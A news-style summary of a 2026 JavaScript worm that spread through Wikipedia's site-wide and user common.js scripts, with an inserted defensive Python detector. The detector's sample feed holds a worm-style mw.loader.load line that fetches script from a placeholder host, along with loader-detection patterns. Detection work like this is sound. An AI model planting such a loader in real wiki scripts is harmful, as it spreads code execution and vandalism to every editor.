Wikipedia Hit by Self-Propagating JavaScript Worm that Vandalized Pages

BleepingComputer, Mar 5, 2026

Why It Matters

The breach exposed a critical vector for code injection in MediaWiki, prompting urgent security hardening for one of the internet’s most visited knowledge bases. It underscores the need for stricter controls over user‑authored scripts to protect editorial integrity and user trust.

Key Takeaways

  • Worm altered MediaWiki:Common.js globally.
  • ~3,996 pages vandalized on Meta‑Wiki.
  • 85 user scripts infected during 23‑minute window.
  • Editing temporarily disabled across Wikimedia projects.
  • Foundation plans new security safeguards.

Pulse Analysis

The worm leveraged MediaWiki’s flexible JavaScript architecture, where global and user‑specific scripts run in every editor’s browser. By inserting a loader into MediaWiki:Common.js, the malicious code achieved site‑wide execution, while also overwriting individual users’ common.js files to ensure persistence. This dual‑level approach allowed the script to self‑replicate rapidly, exploiting the same privilege escalation path that powers legitimate customizations. Such an attack demonstrates how open‑source platforms can be weaponized when script validation and execution contexts are insufficiently sandboxed.
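To make that mechanism concrete from the defender's side, here is an added example (not code from the article, from BleepingComputer or from Wikimedia) of detection logic run over a constructed feed of script-page revisions: it flags a loader call added to a site-wide MediaWiki:*.js page, and separately flags the same inserted snippet landing in several users' common.js pages within one short window, which is the self-replication pattern described above. The loader regexes, the revision-dict shape and the placeholder host are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Idioms that pull further JavaScript into every reader's browser. These are
# assumed review heuristics, not patterns quoted from the article.
LOADER_RE = re.compile(
    r"mw\.loader\.load\s*\(|importScript\s*\(|createElement\s*\(\s*['\"]script['\"]")
# Pages whose code runs for every reader (MediaWiki:*.js) or for one account.
SCRIPT_PAGE_RE = re.compile(r"^(MediaWiki:.*\.js|User:[^/]+/common\.js)$")

def added_lines(old, new):
    """Non-blank lines present in the new revision but absent from the old."""
    old_set = set(old.splitlines())
    return [l for l in new.splitlines() if l.strip() and l not in old_set]

def flag_revision(rev):
    """True when a script-page edit introduces a loader call."""
    if not SCRIPT_PAGE_RE.match(rev["title"]):
        return False
    return any(LOADER_RE.search(l) for l in added_lines(rev["old"], rev["new"]))

def detect(revs, window=timedelta(minutes=30), min_pages=3):
    """Return (global_hits, alerts): a loader added to a MediaWiki:*.js page is
    reported on its own; one snippet reaching several users' common.js pages
    inside a single window is the self-replication signature."""
    global_hits, by_snippet = [], defaultdict(list)
    for rev in revs:
        if not flag_revision(rev):
            continue
        if rev["title"].startswith("MediaWiki:"):
            global_hits.append(rev["title"])
        else:
            by_snippet["\n".join(added_lines(rev["old"], rev["new"]))].append(rev)
    alerts = []
    for snippet, hits in by_snippet.items():
        hits.sort(key=lambda r: r["ts"])
        if len(hits) >= min_pages and hits[-1]["ts"] - hits[0]["ts"] <= window:
            alerts.append({"snippet": snippet, "pages": [h["title"] for h in hits]})
    return global_hits, alerts

# Constructed sample feed; the host is a placeholder, not a real indicator.
T0 = datetime(2026, 3, 5, 12, 0)
WORM = "mw.loader.load('//loader.example.invalid/w.js');"
SAMPLE = [
    {"title": "MediaWiki:Common.js", "ts": T0, "old": "/* site js */",
     "new": "/* site js */\n" + WORM},
    {"title": "User:Alice/common.js", "ts": T0 + timedelta(minutes=2), "old": "", "new": WORM},
    {"title": "User:Bob/common.js", "ts": T0 + timedelta(minutes=9),
     "old": "importScript('User:Bob/tools.js');", "new": "importScript('User:Bob/tools.js');\n" + WORM},
    {"title": "User:Carol/common.js", "ts": T0 + timedelta(minutes=20), "old": "", "new": WORM},
    {"title": "User:Dave/common.js", "ts": T0 + timedelta(minutes=25), "old": "", "new": "function hi() { return 1; }"},
]
```

Bob's edit keeps his existing importScript line, so only the newly added loader counts; Dave's benign function edit is not flagged at all.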

Wikimedia’s response was swift: editing was temporarily frozen across all projects, automated revert tools were deployed, and the compromised scripts were purged from both global and user namespaces. Within 23 minutes, the malicious code was removed and the vandalized Meta‑Wiki pages were restored, limiting any lasting damage. The incident also revealed gaps in the testing workflow, as the dormant script was inadvertently activated by a staff account during a routine review. By publicly sharing the incident log and a concise statement, the Foundation aimed to maintain transparency and reassure the community.

Going forward, the Wikimedia Foundation is expected to tighten its code‑review policies, introduce stricter permission checks for script edits, and possibly sandbox user‑generated JavaScript to prevent similar exploits. The episode serves as a cautionary tale for other collaborative platforms that rely on user‑contributed client‑side code, emphasizing the balance between extensibility and security. Strengthening governance around script deployment will be essential to safeguard the integrity of open knowledge ecosystems and retain user confidence.
